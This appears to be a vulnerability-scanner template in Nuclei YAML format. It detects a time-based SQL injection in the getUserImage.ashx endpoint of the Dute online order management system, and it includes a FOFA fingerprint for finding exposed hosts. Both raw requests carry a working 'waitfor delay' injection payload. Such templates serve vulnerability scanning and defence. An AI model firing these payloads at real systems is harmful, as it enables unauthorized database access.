http:
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      matchers-condition: and
      raw:
        - |
          GET /ajax/getUserImage.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:4 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
          Accept-Encoding: gzip, deflate
          Accept-Language: zh-CN,zh;q=0.9
          Connection: close
        - |
          GET /ajax/getUserImage.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:8 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
          Accept-Encoding: gzip, deflate
          Accept-Language: zh-CN,zh;q=0.9
          Connection: close
id: dute-getUserImage_ashx-sql
info:
    author: Superhero
    description: |-
        fofa: app="TUTORSOFT-ERP"
        由于杜特网上订单管理系统 getUserImage.ashx 接口未对用户传入的参数进行合理的校验和过滤，导致传入的参数直接携带到数据库执行，导致SQL注入漏洞，未经身份验证的攻击者可通过此漏洞获取数据库权限，深入利用可获取服务器权限。
    name: 杜特网上订单管理系统 getUserImage.ashx SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/2jdFosfJPsHn5HkwWnSABQ?token=1383368913&lang=zh_CN
    severity: high
    tags: []
